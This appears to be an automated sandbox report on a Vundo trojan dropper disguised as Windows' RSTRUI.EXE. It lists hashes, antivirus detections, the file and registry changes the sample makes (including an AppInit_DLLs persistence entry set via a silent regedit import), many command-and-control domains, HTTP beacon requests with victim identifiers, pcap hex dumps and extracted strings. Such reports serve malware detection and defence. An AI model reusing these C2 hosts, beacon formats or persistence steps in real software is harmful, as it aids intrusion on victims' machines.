Analysis Date2013-09-18 00:12:16
MD514acf25cdb0222209b2c2f954203c384
SHA1ca6b9f60978f366b906fd748c97261fa0d2bc93d

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 2150369aed42ac9596edae4ed3a11934 sha1: d8f8448373188ba5499679eaea7d400dd23e4286 size: 91648
Section_ASM2 md5: 2d399b252d798ff86965fc5dd932b0ce sha1: d9c34739876fb6684fbda97ee54c36e55ccc95fe size: 63488
Section.rdata md5: 80759194640cd0c281898748a3c7253b sha1: dcb925370efdab1968bdce434442f7fbd7245c68 size: 8192
Section.data md5: 8f29192ca6d1ddb0cef33d944900a551 sha1: 7329a34683cd90848c18c960c4abc8cecfc34a33 size: 5120
Section.tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section.rsrc md5: c57f9dda23e74dc2dffbaa3c8425f4c6 sha1: b4ae49516f17224939910fb68e13bc1ba5f2c037 size: 34304
Timestamp2012-09-25 04:20:52
VersionLegalCopyright: © Корпорация Майкрософт. Все права защищены.
InternalName: RSTRUI.EXE
FileVersion: 5.1.2600.5512 (xpsp.080413-2108)
CompanyName: Корпорация Майкрософт
ProductName: Операционная система Microsoft® Windows®
ProductVersion: 5.1.2600.5512
FileDescription: Приложение восстановления системы
OriginalFilename: RSTRUI.EXE
PackerMicrosoft Visual C++ ?.?
PEhashb346d8973479d0079c4245f4806f7f3d8c4e1956
AVavgGeneric_r.BGN
AVaviraTR/Vundo.Gen7
AVmsseTrojanDropper:Win32/Vundo.V

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021494-0000-0000-C000-000000000046}\Enum\Implementing ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\NetCache\AdminPinStartTime ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021493-0000-0000-C000-000000000046}\Enum\Implementing ➝
NULL
RegistryHKEY_CURRENT_USER\SessionInformation\ProgramCount ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\SysTray\Services ➝
31
Creates FileC:\WINDOWS\system32\ujhbixa.dll
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNSclickbeta.ru
Winsock DNSdenadb.com
Winsock DNS91.220.35.154
Winsock DNSterrans.su
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdenareclick.com
Winsock DNSfescheck.com
Winsock DNSinstrango.com
Winsock DNSverzinla.com
Winsock DNSgetintsu.com
Winsock DNStegimode.com
Winsock DNSnetrovad.com
Winsock DNSnshouse1.com
Winsock DNSveriolana.com
Winsock DNSinzavora.com
Winsock DNSodobvare.com
Winsock DNSforadns.com
Winsock DNSgetavodes.com
Winsock DNSclickstano.com

Process
↳ Pid 528

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\ujhbixa.dll\\x00

Network Details:

DNSgetavodes.com
Type: A
62.116.143.17
DNStryatdns.com
Type: A
62.116.143.17
DNStegimode.com
Type: A
190.93.245.20
DNStegimode.com
Type: A
190.93.244.20
DNStegimode.com
Type: A
141.101.115.20
DNStegimode.com
Type: A
141.101.114.20
DNStegimode.com
Type: A
190.93.246.20
DNSdenadb.com
Type: A
190.93.245.20
DNSdenadb.com
Type: A
190.93.246.20
DNSdenadb.com
Type: A
141.101.115.20
DNSdenadb.com
Type: A
141.101.114.20
DNSdenadb.com
Type: A
190.93.244.20
DNSforadns.com
Type: A
208.73.211.230
DNSnshouse1.com
Type: A
208.73.211.230
DNSveriolana.com
Type: A
DNSverzinla.com\032
Type: A
DNSgetintsu.com
Type: A
DNSfescheck.com
Type: A
DNSinstrango.com
Type: A
DNSnetrovad.com
Type: A
DNSinzavora.com
Type: A
DNSodobvare.com
Type: A
DNSterrans.su
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2006&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/8fYJKHPozjbfIOiWMLHxonhJ6hLkPf1JJA9b6cfiW8
User-Agent:
HTTP GEThttp://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2006&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/8fYJKHPozjbfIOiWMLHxonhJ6hLkPf1DzBKmUpbj7Q
User-Agent:
HTTP GEThttp://tegimode.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2006&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/8fYJKHPozjbfIOiWMLHxonhJ6hLkPf1MEoAcex27Z3
User-Agent:
HTTP GEThttp://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2006&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/8fYJKHPozjbfIOiWMLHxonhJ6hLkPf1NaKkoAF69Wt
User-Agent:
HTTP GEThttp://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2006&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/8fYJKHPozjbfIOiWMLHxonhJ6hLkPf1GxW+tI6Rxxj
User-Agent:
HTTP GEThttp://nshouse1.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2006&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/8fYJKHPozjbfIOiWMLHxonhJ6hLkPf1BOzHyjlft95
User-Agent:
HTTP GEThttp://91.220.35.154/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2006&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/8fYJKHPozjbfIOiWMLHxonhJ6hLkPf1MMf55iwxyWD
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 62.116.143.17:80
Flows TCP192.168.1.1:1032 ➝ 62.116.143.17:80
Flows TCP192.168.1.1:1033 ➝ 190.93.245.20:80
Flows TCP192.168.1.1:1034 ➝ 190.93.245.20:80
Flows TCP192.168.1.1:1035 ➝ 208.73.211.230:80
Flows TCP192.168.1.1:1036 ➝ 208.73.211.230:80
Flows TCP192.168.1.1:1037 ➝ 91.220.35.154:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 30303626   XX0000&key=2006&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343926 6f733d35 2e312e32 3630302e   =49&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f38 66594a4b 48506f7a 6a626649   yg/8fYJKHPozjbfI
0x000000b0 (00176)   4f69574d 4c48786f 6e684a36 684c6b50   OiWMLHxonhJ6hLkP
0x000000c0 (00192)   66314a4a 41396236 63666957 38204854   f1JJA9b6cfiW8 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206765   TP/1.1..Host: ge
0x000000e0 (00224)   7461766f 6465732e 636f6d0d 0a0d0a     tavodes.com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 30303626   XX0000&key=2006&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343926 6f733d35 2e312e32 3630302e   =49&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f38 66594a4b 48506f7a 6a626649   yg/8fYJKHPozjbfI
0x000000b0 (00176)   4f69574d 4c48786f 6e684a36 684c6b50   OiWMLHxonhJ6hLkP
0x000000c0 (00192)   6631447a 424b6d55 70626a37 51204854   f1DzBKmUpbj7Q HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a207472   TP/1.1..Host: tr
0x000000e0 (00224)   79617464 6e732e63 6f6d0d0a 0d0a0a     yatdns.com.....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 30303626   XX0000&key=2006&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343926 6f733d35 2e312e32 3630302e   =49&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f38 66594a4b 48506f7a 6a626649   yg/8fYJKHPozjbfI
0x000000b0 (00176)   4f69574d 4c48786f 6e684a36 684c6b50   OiWMLHxonhJ6hLkP
0x000000c0 (00192)   66314d45 6f416365 7832375a 33204854   f1MEoAcex27Z3 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a207465   TP/1.1..Host: te
0x000000e0 (00224)   67696d6f 64652e63 6f6d0d0a 0d0a0a     gimode.com.....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 30303626   XX0000&key=2006&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343926 6f733d35 2e312e32 3630302e   =49&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f38 66594a4b 48506f7a 6a626649   yg/8fYJKHPozjbfI
0x000000b0 (00176)   4f69574d 4c48786f 6e684a36 684c6b50   OiWMLHxonhJ6hLkP
0x000000c0 (00192)   66314e61 4b6b6f41 46363957 74204854   f1NaKkoAF69Wt HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206465   TP/1.1..Host: de
0x000000e0 (00224)   6e616462 2e636f6d 0d0a0d0a 0d0a0a     nadb.com.......

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 30303626   XX0000&key=2006&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343926 6f733d35 2e312e32 3630302e   =49&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f38 66594a4b 48506f7a 6a626649   yg/8fYJKHPozjbfI
0x000000b0 (00176)   4f69574d 4c48786f 6e684a36 684c6b50   OiWMLHxonhJ6hLkP
0x000000c0 (00192)   66314778 572b7449 36527878 6a204854   f1GxW+tI6Rxxj HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20666f   TP/1.1..Host: fo
0x000000e0 (00224)   7261646e 732e636f 6d0d0a0d 0a0a0a     radns.com......

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 30303626   XX0000&key=2006&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343926 6f733d35 2e312e32 3630302e   =49&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f38 66594a4b 48506f7a 6a626649   yg/8fYJKHPozjbfI
0x000000b0 (00176)   4f69574d 4c48786f 6e684a36 684c6b50   OiWMLHxonhJ6hLkP
0x000000c0 (00192)   6631424f 7a48796a 6c667439 35204854   f1BOzHyjlft95 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206e73   TP/1.1..Host: ns
0x000000e0 (00224)   686f7573 65312e63 6f6d0d0a 0d0a0a     house1.com.....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 30303626   XX0000&key=2006&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343926 6f733d35 2e312e32 3630302e   =49&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f38 66594a4b 48506f7a 6a626649   yg/8fYJKHPozjbfI
0x000000b0 (00176)   4f69574d 4c48786f 6e684a36 684c6b50   OiWMLHxonhJ6hLkP
0x000000c0 (00192)   66314d4d 66353569 77787957 44204854   f1MMf55iwxyWD HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a203931   TP/1.1..Host: 91
0x000000e0 (00224)   2e323230 2e33352e 3135340d 0a0d0a     .220.35.154....


Strings
                          
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
~0jj}u;5
0mcXqk
0SSSSS
	0'XuX
1Ie2rt
1Te\wN
1YV4oP
_,2<b|
-2,BMN]b
#2[Nys
3%?3t^4
3>ans!cnA~
3"+dminbL_iE\
`[~3um
43r1Z^C
4(j/>t
4P2I1K;;T
:|'&<5,
5-5rem
$)59DETY
5h`t]QW
:*&/6?
6yl3";
6>yNV.fn
7c>i0N
7")~+V
>-/].8
8;7780
8 WtnXea
a./0@O
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABV*xTK(
ADVAPI32.dll
ADVAPI32.DLL
AdviseInUserModeA
?aiteZ
AJQZlu
|_a"ki:
{;akqT
An application has made an attempt to load the C runtime library incorrectly.
A[SGt@
`_ASM2
aTiaF~
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
A;V@xfD
ayy-eo
_BARLvE
BeginPaint
'BhzRh+P
\blr<_
C~Kb%c
CloseHandle
CorExitProcess
CoTaskMemAlloc
CreateBitmap
CreateSolidBrush
CreateWindowExA
- CRT not initialized
CTiW\+ospLLtid0
~CV+[ 
D=	=	=
_d3L*-
@.data
DateTime:%04d.%02d:%d
!Dcele
DDDDDC
DDDDDDDDDD
dddd, MMMM dd, yyyy
December
DecodePointer
DeleteCriticalSection
DestroyWindow
DeviceIoControl
DispatchMessageA
DOMAIN error
DP7m0i((
DrawTextA
%dunum
e.5et\\e
EDAaA)aoetuyDe
EiceF)
EIEO5e
elqHeOEx
EncodePointer
EndPaint
EnterCriticalSection
]eq|}h
ereed:d
er.ii?o
#(E\v:
ExitProcess
EXst]mu
f1\'a3
f352#jG6
February
f~;f=3
FindResourceA
'-fjx[	B
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
f_pxsUe
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
FT%eTdSS
\(F/)v
:FWvnWhPGplc
GDI32.dll
GetACP
GetActiveWindow
GetClientRect
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDeviceCaps
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemMetrics
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersion
g=(Lmh
Gn3rt#iS%an]et
gszDnO
Gysrtau
:G<z6G
H@a0(e
h@AAu5
hDb3rH
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
HH:mm:ss
HHUP[Xb
i8#3E4)
iA{Gc<
Ia*tGXv
@^+=}iC
iedpt g
!Iedt=eyntC|5yAiF
:iiSe4
IJ[72m
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
IsDebuggerPresent
IsValidCodePage
 i[voPiz
|iY;}F
$j1Y]9
j*$2LV
j@@A^@
JanFebMarAprMayJunJulAugSepOctNovDec
January
JavaStudioClass
*jE~' 
j@j ^V
jjz`@r3
KERNEL32.dll
KHE_3NCni
kiCOr?oe
KiqwPp)
 l6Sq%}
LCMapStringA
LCMapStringW
>ldga 
LeaveCriticalSection
lFL.`da+
,L$I@E
LoadAcceleratorsA
LoadCursorA
LoadIconA
LoadIconW
LoadLibraryA
LoadResource
LoadStringA
LockResource
lP?AMr
lrIFeeW
lstrcmpiA
LtAIzXnC
ltRWC,dFt
L.-+v)z?`
*M=.ab
MessageBoxA
Microsoft Visual C++ Runtime Library
MM/dd/yy
MN]owPsW
M[``nv
&mojleqln7miJna
Monday
m~%pFlu
mrIor]K.
M-Udc	cn
MultiByteToWideChar
M ,yMY
N^BO<p
NJduen
nkSeu eO
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
oa0i ,ol
October
@oehpf
okz0Ue
ole32.dll
o	ttatet
oyy"crz
;P3V3j
P4@k|;+
peMjf/
Please contact the application's support team for more information.
{pl'k5Sh|
PLSEB@
PPPPPPPP
Program: 
<program name unknown>
  Pse[gn
<ptia0
- pure virtual function call
PW]AWPv
QueryPerformanceCounter
}Q\XBt
r#*'78m
 r(A t7
`.rdata
rdLizF
Rectangle
RegConnectRegistryA
RegisterClassExA
rGE/o7
RHdei)
RtlUnwind
R<$U?D_`
runtime error 
Runtime Error!
r	=&Vl
RZ!Ae>
's3zf`I 
Saturday
scm32.dll
SE9 ,8
September
SetFilePointer
SetHandleCount
SetLastError
SetParent
SetUnhandledExceptionFilter
sH?I7$
ShowWindow
ShtFo/lm
SING error
StB<{~
strcat
Sunday
SunMonTueWedThuFriSat
t3<EWE
ta}ExO
tBM9e[h
 +t@CB;
tCreL_ai
TerminateProcess
TextOutA
:T>fpNfp
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
tICmT*i
< tK<	tG
<'TK$V
TLOSS error
tl:P2-s
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
tojGaWte
TranslateAcceleratorA
TranslateMessage
TrnnO/
t"SS9]
TtuotcHr
;t%"u@3@
t$<"u	3
Tuesday
;t$,v-
t+WWVPV
u]56lD0
 uFerK a
UgQP*)
uiR,nlpe
uiteDI
ujl57@
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UpdateWindow
UQPXY]Y[
URPQQh
USER32.dll
USER32.DLL
	utdsE
@&}u|u
u<*~u4
>VB sR
:Vd,ddy
VirtualAlloc
VirtualFree
V]lc,r
v	N+D$
vvCvvOvv
vwtusrv
w0v\f^rs
%<w4F&
Wednesday
We|oy0Dt}AW2r
WideCharToMultiByte
WriteFile
wsprintfA
wtDDDDDDDC
Wt	j~^
wwwws0
wwwwwwws
wwwwwwww?
wwwwwwwws
wwwwwwwwww
wwwwwwwwwwwww
wwwwwwwwwwwwww
wwwwwwwwwwwwwwz
wwwwwwwwwwwwwz
wwwwwwwwwwwwwzwwww
wwwwwwwwzww
wwwwwwwxx
wwwwwwwz
wwwwwwwzww
x2e"uL
YB5Uv.
ydm |V
  y HU
Yq>_BR
>=Yt1j
_YtPOP
  y  U
Yu|vlE
yy;Ce4dc
\z1lDM
ZfnJ{'o
],zq\I,